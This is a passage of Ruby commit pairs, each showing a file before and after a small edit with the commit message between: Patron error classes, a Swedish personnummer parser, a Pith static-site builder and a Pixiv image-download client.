  # Gets raised when failing to connect to the remote host.
  class ConnectionFailed < Error
  end

  # Gets raised when the response was shorter or larger than expected.
  # This happens when the server first reports an expected transfer
  # size, and then delivers data that doesn't match the previously
  # given size.
  class PartialFileError < Error
  end

  # Gets raised on an operation timeout: the specified time-out
  # period was reached.
  class TimeoutError < Error
  end

  # Gets raised on too many redirects: when following redirects,
  # Patron hit the maximum amount.
  class TooManyRedirects < Error
  end

  # Gets raised when the server specifies an encoding that could not
  # be found, or has an invalid name, or when the server "lies" about
  # the encoding of the response body (such as can be the case when
  # the server specifies an encoding in `Content-Type`) which the
  # HTML generator then overrides with a `meta` element.
  class HeaderCharsetInvalid < Error
  end

  # Gets raised when you try to use `decoded_body` but it can't be
  # represented by your Ruby process's current internal encoding.
  # Subclasses HeaderCharsetInvalid so that existing rescues keep
  # working.
  class NonRepresentableBody < HeaderCharsetInvalid
  end
end
|
# -*- encoding: utf-8 -*-
require 'date'
class Personnummer
  # Public readonly attributes
  attr_reader :born, :region, :control_digit

  # Parse a Swedish personnummer of the form [18|19|20|21]YYMMDD[-+]NNN[C].
  # The optional century prefix is tolerated but ignored when inferring the
  # birth date.
  #
  # number - String (or anything responding to #to_s) holding the number.
  #
  # Raises ArgumentError when the input cannot be parsed at all.
  def initialize(number)
    @valid = false
    number = number.to_s
    # Capture a local MatchData rather than relying on the $~ special
    # variable, so intervening method calls can never clobber the match.
    m = number.match(/(?:18|19|20|21){0,1}(\d{2})(\d{2})(\d{2})([\-\+]{0,1})(\d{3})(\d{0,1})/)
    if m
      # Control digit is computed (Luhn) over birth date + serial number.
      @control_digit = luhn_algorithm("#{m[1]}#{m[2]}#{m[3]}#{m[5]}")
      year  = m[1].to_i
      month = m[2].to_i
      day   = m[3].to_i
      @divider = m[4]
      @serial  = m[5].to_i
      # Set default divider if not present.
      @divider = '-' if @divider.empty?
      # Valid only when a control digit was supplied and it checks out.
      @valid = true if !m[6].empty? && @control_digit == m[6].to_i
      today = Date.today
      # Decide which century corresponds to the two-digit year; a '+'
      # divider marks a person aged 100 or more.
      if year < (today.year - 2000) && @divider == '-'
        century = 2000
      elsif year < (today.year - 2000) && @divider == '+'
        century = 1900
      elsif @divider == '+'
        century = 1800
      else
        century = 1900
      end
      # Get the date the person was born.
      @born = Date.parse("#{century + year}-#{month}-#{day}")
      @region = region_name(@serial)
      # Even serial number == female.
      @female = (@serial % 2 == 0)
    else
      # BUG FIX: was `raise ArgumentError.new, "msg"`; use the idiomatic
      # class-plus-message form.
      raise ArgumentError, "The supplied personnummer is invalid"
    end
  end

  # Age in whole years.
  #
  # BUG FIX: the previous (days / 365) division drifted by one year near
  # birthdays once enough leap days accumulated; compute from calendar
  # fields instead.
  def age
    today = Date.today
    return 0 if today <= @born
    years = today.year - @born.year
    if today.month < @born.month || (today.month == @born.month && today.day < @born.day)
      years -= 1
    end
    years
  end

  # Canonical 10-digit representation, e.g. "121212-1212".
  def to_s
    "%s%s%03d%d" % [@born.strftime("%y%m%d"), @divider, @serial, @control_digit]
  end

  # True when the supplied control digit matched the computed one.
  def valid?
    @valid
  end

  def male?
    !@female
  end

  def female?
    @female
  end

  private

  # Luhn checksum as used by personnummer: digits at even positions are
  # doubled, the decimal digits of all products are summed, and the control
  # digit is whatever lifts the sum to the next multiple of ten.
  def luhn_algorithm(number)
    multiplications = []
    number.split(//).each_with_index do |digit, i|
      if i % 2 == 0
        multiplications << digit.to_i * 2
      else
        multiplications << digit.to_i
      end
    end
    sum = 0
    multiplications.each do |product|
      product.to_s.each_byte do |character|
        sum += character.chr.to_i
      end
    end
    if sum % 10 == 0
      0
    else
      (sum / 10 + 1) * 10 - sum
    end
  end

  # Map the serial number to the issuing region. The scheme was abolished
  # in 1990, so '' is returned for people born after that.
  # NOTE(review): codes 740..749 fall outside every range and yield nil —
  # presumably unassigned; confirm against the historical code table.
  def region_name(code)
    if @born.year > 1990
      return ''
    end
    case code
    when 0..139 then 'Stockholms Län'
    when 140..159 then 'Uppsala län'
    when 160..189 then 'Södermanlands län'
    when 190..239 then 'Östergötlands län'
    when 240..269 then 'Jönköpings län'
    when 270..289 then 'Kronobergs län'
    when 290..319 then 'Kalmar län'
    when 320..329 then 'Gotlands län'
    when 330..349 then 'Blekinge län'
    when 350..389 then 'Kristianstads län'
    when 390..459 then 'Malmöhus län'
    when 460..479 then 'Hallands län'
    when 480..549 then 'Göteborgs och Bohus län'
    when 550..589 then 'Älvsborgs län'
    when 590..619 then 'Skaraborgs län'
    when 620..649 then 'Värmlands län'
    when 650..659 then 'Födda utomlands'
    when 660..689 then 'Örebro län'
    when 690..709 then 'Västmanlands län'
    when 710..739 then 'Kopparbergs län'
    when 750..779 then 'Gävleborgs län'
    when 780..819 then 'Västernorrlands län'
    when 820..849 then 'Jämtlands län'
    when 850..889 then 'Västerbottens län'
    when 890..929 then 'Norrbottens län'
    when 930..999 then 'Födda utomlands eller utländska medborgare födda i Sverige'
    end
  end
end
Handle century if given
# -*- encoding: utf-8 -*-
require 'date'
class Personnummer
  # Public readonly attributes
  attr_reader :born, :region, :control_digit

  # Parse a Swedish personnummer of the form [CC]YYMMDD[-+]NNN[C], where an
  # explicit two-digit century (e.g. "19") is honoured when given and
  # inferred from the divider otherwise.
  #
  # number - String (or anything responding to #to_s) holding the number.
  #
  # Raises ArgumentError when the input cannot be parsed at all.
  def initialize(number)
    @valid = false
    number = number.to_s
    # Capture a local MatchData rather than relying on the $~ special
    # variable, so intervening method calls can never clobber the match.
    # NOTE(review): any two digits are accepted as a century here — verify
    # whether it should be restricted to 18/19/20/21.
    m = number.match(/(\d{2}){0,1}(\d{2})(\d{2})(\d{2})([\-\+]{0,1})(\d{3})(\d{0,1})/)
    if m
      # Control digit is computed (Luhn) over birth date + serial number.
      @control_digit = luhn_algorithm("#{m[2]}#{m[3]}#{m[4]}#{m[6]}")
      century = m[1].to_i
      year    = m[2].to_i
      month   = m[3].to_i
      day     = m[4].to_i
      @divider = m[5]
      @serial  = m[6].to_i
      # Set default divider if not present.
      @divider = '-' if @divider.empty?
      # Valid only when a control digit was supplied and it checks out.
      @valid = true if !m[7].empty? && @control_digit == m[7].to_i
      today = Date.today
      if century == 0
        # No century given: infer it; a '+' divider marks a person aged
        # 100 or more.
        if year < (today.year - 2000) && @divider == '-'
          century = 2000
        elsif year < (today.year - 2000) && @divider == '+'
          century = 1900
        elsif @divider == '+'
          century = 1800
        else
          century = 1900
        end
      else
        century *= 100
      end
      # Get the date the person was born.
      @born = Date.parse("#{century + year}-#{month}-#{day}")
      @region = region_name(@serial)
      # Even serial number == female.
      @female = (@serial % 2 == 0)
    else
      # BUG FIX: was `raise ArgumentError.new, "msg"`; use the idiomatic
      # class-plus-message form.
      raise ArgumentError, "The supplied personnummer is invalid"
    end
  end

  # Age in whole years.
  #
  # BUG FIX: the previous (days / 365) division drifted by one year near
  # birthdays once enough leap days accumulated; compute from calendar
  # fields instead.
  def age
    today = Date.today
    return 0 if today <= @born
    years = today.year - @born.year
    if today.month < @born.month || (today.month == @born.month && today.day < @born.day)
      years -= 1
    end
    years
  end

  # Canonical 10-digit representation, e.g. "121212-1212".
  def to_s
    "%s%s%03d%d" % [@born.strftime("%y%m%d"), @divider, @serial, @control_digit]
  end

  # True when the supplied control digit matched the computed one.
  def valid?
    @valid
  end

  def male?
    !@female
  end

  def female?
    @female
  end

  private

  # Luhn checksum as used by personnummer: digits at even positions are
  # doubled, the decimal digits of all products are summed, and the control
  # digit is whatever lifts the sum to the next multiple of ten.
  def luhn_algorithm(number)
    multiplications = []
    number.split(//).each_with_index do |digit, i|
      if i % 2 == 0
        multiplications << digit.to_i * 2
      else
        multiplications << digit.to_i
      end
    end
    sum = 0
    multiplications.each do |product|
      product.to_s.each_byte do |character|
        sum += character.chr.to_i
      end
    end
    if sum % 10 == 0
      0
    else
      (sum / 10 + 1) * 10 - sum
    end
  end

  # Map the serial number to the issuing region. The scheme was abolished
  # in 1990, so '' is returned for people born after that.
  # NOTE(review): codes 740..749 fall outside every range and yield nil —
  # presumably unassigned; confirm against the historical code table.
  def region_name(code)
    if @born.year > 1990
      return ''
    end
    case code
    when 0..139 then 'Stockholms Län'
    when 140..159 then 'Uppsala län'
    when 160..189 then 'Södermanlands län'
    when 190..239 then 'Östergötlands län'
    when 240..269 then 'Jönköpings län'
    when 270..289 then 'Kronobergs län'
    when 290..319 then 'Kalmar län'
    when 320..329 then 'Gotlands län'
    when 330..349 then 'Blekinge län'
    when 350..389 then 'Kristianstads län'
    when 390..459 then 'Malmöhus län'
    when 460..479 then 'Hallands län'
    when 480..549 then 'Göteborgs och Bohus län'
    when 550..589 then 'Älvsborgs län'
    when 590..619 then 'Skaraborgs län'
    when 620..649 then 'Värmlands län'
    when 650..659 then 'Födda utomlands'
    when 660..689 then 'Örebro län'
    when 690..709 then 'Västmanlands län'
    when 710..739 then 'Kopparbergs län'
    when 750..779 then 'Gävleborgs län'
    when 780..819 then 'Västernorrlands län'
    when 820..849 then 'Jämtlands län'
    when 850..889 then 'Västerbottens län'
    when 890..929 then 'Norrbottens län'
    when 930..999 then 'Födda utomlands eller utländska medborgare födda i Sverige'
    end
  end
end
|
require "logger"
require "pith/input"
require "pith/pathname_ext"
require "pith/reference_error"
require "tilt"
module Pith
  class Project
    DEFAULT_IGNORE_PATTERNS = ["_*", ".git", ".svn", "*~"].freeze

    # attributes - Hash of writable attributes (e.g. :input_dir,
    #              :output_dir), assigned via the matching setters.
    def initialize(attributes = {})
      @ignore_patterns = DEFAULT_IGNORE_PATTERNS.dup
      attributes.each do |k, v|
        send("#{k}=", v)
      end
    end

    attr_reader :input_dir
    attr_reader :ignore_patterns

    def input_dir=(dir)
      @input_dir = Pathname(dir)
    end

    attr_reader :output_dir

    def output_dir=(dir)
      @output_dir = Pathname(dir)
    end

    attr_accessor :assume_content_negotiation
    attr_accessor :assume_directory_index

    # Public: get inputs
    #
    # Returns Pith::Input objects representing the files in the input_dir.
    #
    # The list of inputs is cached after first load;
    # call #refresh to discard the cached data.
    #
    def inputs
      @inputs ||= input_dir.all_files.map do |input_file|
        path = input_file.relative_path_from(input_dir)
        find_or_create_input(path)
      end.compact
    end

    # Public: find an input.
    #
    # path - a path relative to either input_dir or output_dir
    #
    # Returns the first input whose input_path or output_path matches.
    # Returns nil if no match is found.
    #
    def input(path)
      path = Pathname(path)
      # Idiom: Enumerable#find expresses first-match-or-nil directly
      # (previously a manual each/early-return loop).
      inputs.find do |input|
        input.path == path || input.output_path == path
      end
    end

    # Public: build the project, generating output files.
    #
    def build
      refresh
      load_config
      remove_old_outputs
      output_dir.mkpath
      generate_outputs
      output_dir.touch
    end

    # Public: discard cached data that is out-of-sync with the file-system.
    #
    def refresh
      @inputs = nil
      @config_files = nil
    end

    # Public: check for errors.
    #
    # Returns true if any errors were encountered during the last build.
    # BUG FIX: guard against @inputs being nil (no build yet) instead of
    # raising NoMethodError.
    def has_errors?
      Array(@inputs).any?(&:error)
    end

    def last_built_at
      output_dir.mtime
    end

    # Defaults to a null logger, so logging is opt-in.
    def logger
      @logger ||= Logger.new(nil)
    end

    attr_writer :logger

    # Evaluate the block inside the shared helper module, making its
    # methods available to templates.
    def helpers(&block)
      helper_module.module_eval(&block)
    end

    def helper_module
      @helper_module ||= Module.new
    end

    def config_files
      @config_files ||= begin
        input_dir.all_files("_pith/**")
      end.to_set
    end

    private

    # Evaluate "_pith/config.rb" (if present); the config script sees this
    # Project instance via the `project` local captured in the binding.
    def load_config
      config_file = input_dir + "_pith/config.rb"
      project = self
      if config_file.exist?
        eval(config_file.read, binding, config_file.to_s, 1)
      end
    end

    # Delete files in output_dir that no current input would generate.
    def remove_old_outputs
      valid_output_paths = inputs.map { |i| i.output_path }
      output_dir.all_files.each do |output_file|
        output_path = output_file.relative_path_from(output_dir)
        unless valid_output_paths.member?(output_path)
          logger.info("removing #{output_path}")
          FileUtils.rm(output_file)
        end
      end
    end

    def generate_outputs
      inputs.each do |input|
        input.build
      end
    end

    # Inputs are cached per (path, mtime), so file edits invalidate the cache.
    def input_cache
      @input_cache ||= Hash.new do |h, cache_key|
        h[cache_key] = Input.new(self, cache_key.first)
      end
    end

    def find_or_create_input(path)
      file = input_dir + path
      cache_key = [path, file.mtime]
      input_cache[cache_key]
    end
  end
end
Simplify.
require "logger"
require "pith/input"
require "pith/pathname_ext"
require "pith/reference_error"
require "tilt"
module Pith
  class Project
    DEFAULT_IGNORE_PATTERNS = ["_*", ".git", ".svn", "*~"].freeze

    # attributes - Hash of writable attributes (e.g. :input_dir,
    #              :output_dir), assigned via the matching setters.
    def initialize(attributes = {})
      @ignore_patterns = DEFAULT_IGNORE_PATTERNS.dup
      attributes.each do |k, v|
        send("#{k}=", v)
      end
    end

    attr_reader :input_dir
    attr_reader :ignore_patterns

    def input_dir=(dir)
      @input_dir = Pathname(dir)
    end

    attr_reader :output_dir

    def output_dir=(dir)
      @output_dir = Pathname(dir)
    end

    attr_accessor :assume_content_negotiation
    attr_accessor :assume_directory_index

    # Public: get inputs
    #
    # Returns Pith::Input objects representing the files in the input_dir.
    #
    # The list of inputs is cached after first load;
    # call #refresh to discard the cached data.
    #
    def inputs
      @inputs ||= input_dir.all_files.map do |input_file|
        path = input_file.relative_path_from(input_dir)
        find_or_create_input(path)
      end.compact
    end

    # Public: find an input.
    #
    # path - a path relative to either input_dir or output_dir
    #
    # Returns the first input whose input_path or output_path matches.
    # Returns nil if no match is found.
    #
    def input(path)
      path = Pathname(path)
      inputs.find do |input|
        input.path == path || input.output_path == path
      end
    end

    # Public: build the project, generating output files.
    #
    def build
      refresh
      load_config
      remove_old_outputs
      output_dir.mkpath
      generate_outputs
      output_dir.touch
    end

    # Public: discard cached data that is out-of-sync with the file-system.
    #
    def refresh
      @inputs = nil
      @config_files = nil
    end

    # Public: check for errors.
    #
    # Returns true if any errors were encountered during the last build.
    # BUG FIX: guard against @inputs being nil (no build yet) instead of
    # raising NoMethodError.
    def has_errors?
      Array(@inputs).any?(&:error)
    end

    def last_built_at
      output_dir.mtime
    end

    # Defaults to a null logger, so logging is opt-in.
    def logger
      @logger ||= Logger.new(nil)
    end

    attr_writer :logger

    # Evaluate the block inside the shared helper module, making its
    # methods available to templates.
    def helpers(&block)
      helper_module.module_eval(&block)
    end

    def helper_module
      @helper_module ||= Module.new
    end

    def config_files
      @config_files ||= begin
        input_dir.all_files("_pith/**")
      end.to_set
    end

    private

    # Evaluate "_pith/config.rb" (if present); the config script sees this
    # Project instance via the `project` local captured in the binding.
    def load_config
      config_file = input_dir + "_pith/config.rb"
      project = self
      if config_file.exist?
        eval(config_file.read, binding, config_file.to_s, 1)
      end
    end

    # Delete files in output_dir that no current input would generate.
    def remove_old_outputs
      valid_output_paths = inputs.map { |i| i.output_path }
      output_dir.all_files.each do |output_file|
        output_path = output_file.relative_path_from(output_dir)
        unless valid_output_paths.member?(output_path)
          logger.info("removing #{output_path}")
          FileUtils.rm(output_file)
        end
      end
    end

    def generate_outputs
      inputs.each do |input|
        input.build
      end
    end

    # Inputs are cached per (path, mtime), so file edits invalidate the cache.
    def input_cache
      @input_cache ||= Hash.new do |h, cache_key|
        h[cache_key] = Input.new(self, cache_key.first)
      end
    end

    def find_or_create_input(path)
      file = input_dir + path
      cache_key = [path, file.mtime]
      input_cache[cache_key]
    end
  end
end
|
module Pixiv
  class Client
    # A new agent; image responses are saved as downloads rather than parsed.
    # @return [Mechanize::HTTP::Agent]
    def self.new_agent
      agent = Mechanize.new
      agent.max_history = 1
      agent.pluggable_parser['image/gif'] = Mechanize::Download
      agent.pluggable_parser['image/jpeg'] = Mechanize::Download
      agent.pluggable_parser['image/png'] = Mechanize::Download
      agent
    end

    # @return [Mechanize::HTTP::Agent]
    attr_reader :agent
    # @return [Integer]
    attr_reader :member_id

    # A new instance of Client, logged in with the given credentials
    # @overload initialize(pixiv_id, password)
    #   @param [String] pixiv_id
    #   @param [String] password
    #   @yield [agent] (optional) gives a chance to customize the +agent+ before logging in
    # @overload initialize(agent)
    #   @param [Mechanize::HTTP::Agent] agent
    # @return [Pixiv::Client]
    def initialize(*args)
      if args.size < 2
        @agent = args.first || self.class.new_agent
        yield @agent if block_given?
        ensure_logged_in
      else
        pixiv_id, password = *args
        @agent = self.class.new_agent
        yield @agent if block_given?
        login(pixiv_id, password)
      end
    end

    # Log in to Pixiv
    # @param [String] pixiv_id
    # @param [String] password
    # @raise [Pixiv::Error::LoginFailed] when the login form is missing or login is rejected
    def login(pixiv_id, password)
      doc = agent.get("#{ROOT_URL}/index.php")
      return if doc && doc.body =~ /logout/
      form = doc.forms_with(action: '/login.php').first
      unless form
        # BUG FIX: `puts doc.body and raise ...` never raised, because
        # puts returns nil and `nil and raise` short-circuits.
        puts doc.body
        raise Error::LoginFailed, 'login form is not available'
      end
      form.pixiv_id = pixiv_id
      form.pass = password
      doc = agent.submit(form)
      raise Error::LoginFailed unless doc && doc.body =~ /logout/
      @member_id = member_id_from_mypage(doc)
    end

    # @param [Integer] illust_id
    # @return [Pixiv::Illust] illust bound to +self+
    def illust(illust_id)
      attrs = {illust_id: illust_id}
      illust = Illust.lazy_new(attrs) { agent.get(Illust.url(illust_id)) }
      illust.bind(self)
    end

    # @param [Integer] member_id defaults to the logged-in member's id
    # @return [Pixiv::Member] member bound to +self+
    def member(member_id = self.member_id)
      # BUG FIX: `member_id = member_id` was a circular argument reference
      # (the default evaluated to nil); `self.member_id` calls the reader.
      attrs = {member_id: member_id}
      member = Member.lazy_new(attrs) { agent.get(Member.url(member_id)) }
      member.bind(self)
    end

    # @param [Pixiv::Member, Integer] member_or_member_id
    # @param [Integer] page_num
    # @return [Pixiv::IllustList]
    def illust_list(member_or_member_id = member_id, page_num = 1)
      page_list_with_class(IllustList, member_or_member_id, page_num)
    end

    # @param [Pixiv::Member, Integer] member_or_member_id
    # @param [Integer] page_num
    # @return [Pixiv::BookmarkList]
    def bookmark_list(member_or_member_id = member_id, page_num = 1)
      page_list_with_class(BookmarkList, member_or_member_id, page_num)
    end

    # (see #bookmark_list)
    # @return [Pixiv::PrivateBookmarkList]
    def private_bookmark_list(member_or_member_id = member_id, page_num = 1)
      # BUG FIX: `bookmark_list_with_class` is not defined anywhere;
      # the shared helper is `page_list_with_class`.
      page_list_with_class(PrivateBookmarkList, member_or_member_id, page_num)
    end

    # @param [Pixiv::BookmarkList, Pixiv::Member, Integer] list_or_member
    # @param [Hash] opts
    # @option opts [Boolean] :include_deleted (false)
    #   whether the returning enumerator yields deleted illust as +nil+ or not
    # @return [Pixiv::PageCollection::Enumerator]
    def illusts(list_or_member, opts = {})
      pages_with_class(IllustList, list_or_member, opts)
    end

    # (see #illusts)
    def bookmarks(list_or_member, opts = {})
      pages_with_class(BookmarkList, list_or_member, opts)
    end

    # (see #illusts)
    def private_bookmarks(list_or_member = member_id, opts = {})
      it = list_or_member
      if it.is_a?(BookmarkList) && !it.is_a?(PrivateBookmarkList)
        raise ArgumentError, 'list is not private'
      end
      if it.is_a?(BookmarkList) && it.member_id != member_id
        raise ArgumentError, 'list is not mine'
      end
      if it.is_a?(Member) && it.id != member_id
        raise ArgumentError, 'member is not me'
      end
      if it.is_a?(Integer) && it != member_id
        raise ArgumentError, 'member is not me'
      end
      pages_with_class(PrivateBookmarkList, it, opts)
    end

    # Downloads the image to +io_or_filename+
    # @param [Pixiv::Illust] illust
    # @param [#write, String, Array<String, Symbol, #call>] io_or_filename io or filename or pattern (see {#filename_from_pattern})
    # @param [Symbol] size image size (+:small+, +:medium+, or +:original+)
    def download_illust(illust, io_or_filename, size = :original)
      size = {:s => :small, :m => :medium, :o => :original}[size] || size
      url = illust.__send__("#{size}_image_url")
      # Pixiv requires a size-dependent referer for image requests.
      referer = case size
                when :small then nil
                when :medium then illust.url
                when :original then illust.original_image_referer
                else raise ArgumentError, "unknown size `#{size}`"
                end
      save_to = io_or_filename
      if save_to.is_a?(Array)
        save_to = filename_from_pattern(save_to, illust, url)
      end
      FileUtils.mkdir_p(File.dirname(save_to)) unless save_to.respond_to?(:write)
      @agent.download(url, save_to, [], referer)
    end

    # Downloads the images to +pattern+
    # @param [Pixiv::Illust] illust the manga to download
    # @param [Array<String, Symbol, #call>] pattern pattern (see {#filename_from_pattern})
    # @note +illust#manga?+ must be +true+
    # @todo Document +&block+
    def download_manga(illust, pattern, &block)
      action = DownloadActionRegistry.new(&block)
      illust.original_image_urls.each_with_index do |url, n|
        begin
          action.before_each.call(url, n) if action.before_each
          filename = filename_from_pattern(pattern, illust, url)
          FileUtils.mkdir_p(File.dirname(filename))
          @agent.download(url, filename, [], illust.original_image_referer)
          action.after_each.call(url, n) if action.after_each
        rescue
          action.on_error ? action.on_error.call($!) : raise
        end
      end
    end

    # Generate filename from +pattern+ in context of +illust+ and +url+
    #
    # @api private
    # @param [Array<String, Symbol, #call>] pattern
    # @param [Pixiv::Illust] illust
    # @param [String] url
    # @return [String] filename
    #
    # The +pattern+ is an array of string, symbol, or object that responds to +#call+.
    # Each component of the +pattern+ is replaced by the following rules and then
    # the +pattern+ is concatenated as the returning +filename+.
    #
    # * +:image_name+ in the +pattern+ is replaced with the base name of the +url+
    # * Any other symbol is replaced with the value of +illust.__send__(the_symbol)+
    # * +#call+-able object is replaced with the value of +the_object.call(illust)+
    # * String is left as-is
    def filename_from_pattern(pattern, illust, url)
      pattern.map {|i|
        if i == :image_name
          name = File.basename(url)
          if name =~ /\.(\w+)\?\d+$/
            name += '.' + $1
          end
          name
        elsif i.is_a?(Symbol) then illust.__send__(i)
        elsif i.respond_to?(:call) then i.call(illust)
        else i
        end
      }.join('')
    end

    protected

    # Build a lazily-fetched +list_class+ page for the given member.
    def page_list_with_class(list_class, member_or_member_id, page_num = 1)
      it = member_or_member_id
      member_id = it.is_a?(Member) ? it.member_id : it
      attrs = {member_id: member_id, page_num: page_num}
      list_class.lazy_new(attrs) {
        agent.get(list_class.url(member_id, page_num))
      }
    end

    def pages_with_class(list_class, list_or_member, opts = {})
      if list_or_member.is_a?(list_class)
        list = list_or_member
      else
        list = page_list_with_class(list_class, list_or_member)
      end
      PageCollection::Enumerator.new(self, list, !!opts[:include_deleted])
    end

    # Verify the session is logged in and capture the member id.
    def ensure_logged_in
      doc = agent.get("#{ROOT_URL}/mypage.php")
      raise Error::LoginFailed unless doc.body =~ /logout/
      @member_id = member_id_from_mypage(doc)
    end

    def member_id_from_mypage(doc)
      doc.at('.profile_area a')['href'].match(/(\d+)$/).to_a[1].to_i
    end
  end

  # @private
  class DownloadActionRegistry
    # Collects optional before/after/error callbacks from the DSL block.
    def initialize(&block)
      instance_eval(&block) if block
    end

    def before_each(&block)
      block ? (@before_each = block) : @before_each
    end

    def after_each(&block)
      block ? (@after_each = block) : @after_each
    end

    def on_error(&block)
      block ? (@on_error = block) : @on_error
    end
  end
end
Tweak documentation
module Pixiv
  class Client
    # A new agent; image responses are saved as downloads rather than parsed.
    # @return [Mechanize::HTTP::Agent]
    def self.new_agent
      agent = Mechanize.new
      agent.max_history = 1
      agent.pluggable_parser['image/gif'] = Mechanize::Download
      agent.pluggable_parser['image/jpeg'] = Mechanize::Download
      agent.pluggable_parser['image/png'] = Mechanize::Download
      agent
    end

    # @return [Mechanize::HTTP::Agent]
    attr_reader :agent
    # @return [Integer]
    attr_reader :member_id

    # A new instance of Client, logged in with the given credentials
    # @overload initialize(pixiv_id, password)
    #   @param [String] pixiv_id
    #   @param [String] password
    #   @yield [agent] (optional) gives a chance to customize the +agent+ before logging in
    # @overload initialize(agent)
    #   @param [Mechanize::HTTP::Agent] agent
    # @return [Pixiv::Client]
    def initialize(*args)
      if args.size < 2
        @agent = args.first || self.class.new_agent
        yield @agent if block_given?
        ensure_logged_in
      else
        pixiv_id, password = *args
        @agent = self.class.new_agent
        yield @agent if block_given?
        login(pixiv_id, password)
      end
    end

    # Log in to Pixiv
    # @param [String] pixiv_id
    # @param [String] password
    # @raise [Pixiv::Error::LoginFailed] when the login form is missing or login is rejected
    def login(pixiv_id, password)
      doc = agent.get("#{ROOT_URL}/index.php")
      return if doc && doc.body =~ /logout/
      form = doc.forms_with(action: '/login.php').first
      unless form
        # BUG FIX: `puts doc.body and raise ...` never raised, because
        # puts returns nil and `nil and raise` short-circuits.
        puts doc.body
        raise Error::LoginFailed, 'login form is not available'
      end
      form.pixiv_id = pixiv_id
      form.pass = password
      doc = agent.submit(form)
      raise Error::LoginFailed unless doc && doc.body =~ /logout/
      @member_id = member_id_from_mypage(doc)
    end

    # @param [Integer] illust_id
    # @return [Pixiv::Illust] illust bound to +self+
    def illust(illust_id)
      attrs = {illust_id: illust_id}
      illust = Illust.lazy_new(attrs) { agent.get(Illust.url(illust_id)) }
      illust.bind(self)
    end

    # @param [Integer] member_id defaults to the logged-in member's id
    # @return [Pixiv::Member] member bound to +self+
    def member(member_id = self.member_id)
      # BUG FIX: `member_id = member_id` was a circular argument reference
      # (the default evaluated to nil); `self.member_id` calls the reader.
      attrs = {member_id: member_id}
      member = Member.lazy_new(attrs) { agent.get(Member.url(member_id)) }
      member.bind(self)
    end

    # @param [Pixiv::Member, Integer] member_or_member_id
    # @param [Integer] page_num
    # @return [Pixiv::IllustList]
    def illust_list(member_or_member_id = member_id, page_num = 1)
      page_list_with_class(IllustList, member_or_member_id, page_num)
    end

    # @param [Pixiv::Member, Integer] member_or_member_id
    # @param [Integer] page_num
    # @return [Pixiv::BookmarkList]
    def bookmark_list(member_or_member_id = member_id, page_num = 1)
      page_list_with_class(BookmarkList, member_or_member_id, page_num)
    end

    # @param [Pixiv::Member, Integer] member_or_member_id
    # @param [Integer] page_num
    # @return [Pixiv::PrivateBookmarkList]
    def private_bookmark_list(member_or_member_id = member_id, page_num = 1)
      # BUG FIX: `bookmark_list_with_class` is not defined anywhere;
      # the shared helper is `page_list_with_class`.
      page_list_with_class(PrivateBookmarkList, member_or_member_id, page_num)
    end

    # @param [Pixiv::BookmarkList, Pixiv::Member, Integer] list_or_member
    # @param [Hash] opts
    # @option opts [Boolean] :include_deleted (false)
    #   whether the returning enumerator yields deleted illust as +nil+ or not
    # @return [Pixiv::PageCollection::Enumerator]
    def illusts(list_or_member, opts = {})
      pages_with_class(IllustList, list_or_member, opts)
    end

    # (see #illusts)
    def bookmarks(list_or_member, opts = {})
      pages_with_class(BookmarkList, list_or_member, opts)
    end

    # (see #illusts)
    def private_bookmarks(list_or_member = member_id, opts = {})
      it = list_or_member
      if it.is_a?(BookmarkList) && !it.is_a?(PrivateBookmarkList)
        raise ArgumentError, 'list is not private'
      end
      if it.is_a?(BookmarkList) && it.member_id != member_id
        raise ArgumentError, 'list is not mine'
      end
      if it.is_a?(Member) && it.id != member_id
        raise ArgumentError, 'member is not me'
      end
      if it.is_a?(Integer) && it != member_id
        raise ArgumentError, 'member is not me'
      end
      pages_with_class(PrivateBookmarkList, it, opts)
    end

    # Downloads the image to +io_or_filename+
    # @param [Pixiv::Illust] illust
    # @param [#write, String, Array<String, Symbol, #call>] io_or_filename io or filename or pattern for {#filename_from_pattern}
    # @param [Symbol] size image size (+:small+, +:medium+, or +:original+)
    def download_illust(illust, io_or_filename, size = :original)
      size = {:s => :small, :m => :medium, :o => :original}[size] || size
      url = illust.__send__("#{size}_image_url")
      # Pixiv requires a size-dependent referer for image requests.
      referer = case size
                when :small then nil
                when :medium then illust.url
                when :original then illust.original_image_referer
                else raise ArgumentError, "unknown size `#{size}`"
                end
      save_to = io_or_filename
      if save_to.is_a?(Array)
        save_to = filename_from_pattern(save_to, illust, url)
      end
      FileUtils.mkdir_p(File.dirname(save_to)) unless save_to.respond_to?(:write)
      @agent.download(url, save_to, [], referer)
    end

    # Downloads the images to +pattern+
    # @param [Pixiv::Illust] illust the manga to download
    # @param [Array<String, Symbol, #call>] pattern pattern for {#filename_from_pattern}
    # @note +illust#manga?+ must be +true+
    # @todo Document +&block+
    def download_manga(illust, pattern, &block)
      action = DownloadActionRegistry.new(&block)
      illust.original_image_urls.each_with_index do |url, n|
        begin
          action.before_each.call(url, n) if action.before_each
          filename = filename_from_pattern(pattern, illust, url)
          FileUtils.mkdir_p(File.dirname(filename))
          @agent.download(url, filename, [], illust.original_image_referer)
          action.after_each.call(url, n) if action.after_each
        rescue
          action.on_error ? action.on_error.call($!) : raise
        end
      end
    end

    # Generate filename from +pattern+ in context of +illust+ and +url+
    #
    # @api private
    # @param [Array<String, Symbol, #call>] pattern
    # @param [Pixiv::Illust] illust
    # @param [String] url
    # @return [String] filename
    #
    # The +pattern+ is an array of string, symbol, or object that responds to +#call+.
    # Each component of the +pattern+ is replaced by the following rules and then
    # the +pattern+ is concatenated as the returning +filename+.
    #
    # * +:image_name+ in the +pattern+ is replaced with the base name of the +url+
    # * Any other symbol is replaced with the value of +illust.__send__(the_symbol)+
    # * +#call+-able object is replaced with the value of +the_object.call(illust)+
    # * String is left as-is
    def filename_from_pattern(pattern, illust, url)
      pattern.map {|i|
        if i == :image_name
          name = File.basename(url)
          if name =~ /\.(\w+)\?\d+$/
            name += '.' + $1
          end
          name
        elsif i.is_a?(Symbol) then illust.__send__(i)
        elsif i.respond_to?(:call) then i.call(illust)
        else i
        end
      }.join('')
    end

    protected

    # Build a lazily-fetched +list_class+ page for the given member.
    def page_list_with_class(list_class, member_or_member_id, page_num = 1)
      it = member_or_member_id
      member_id = it.is_a?(Member) ? it.member_id : it
      attrs = {member_id: member_id, page_num: page_num}
      list_class.lazy_new(attrs) {
        agent.get(list_class.url(member_id, page_num))
      }
    end

    def pages_with_class(list_class, list_or_member, opts = {})
      if list_or_member.is_a?(list_class)
        list = list_or_member
      else
        list = page_list_with_class(list_class, list_or_member)
      end
      PageCollection::Enumerator.new(self, list, !!opts[:include_deleted])
    end

    # Verify the session is logged in and capture the member id.
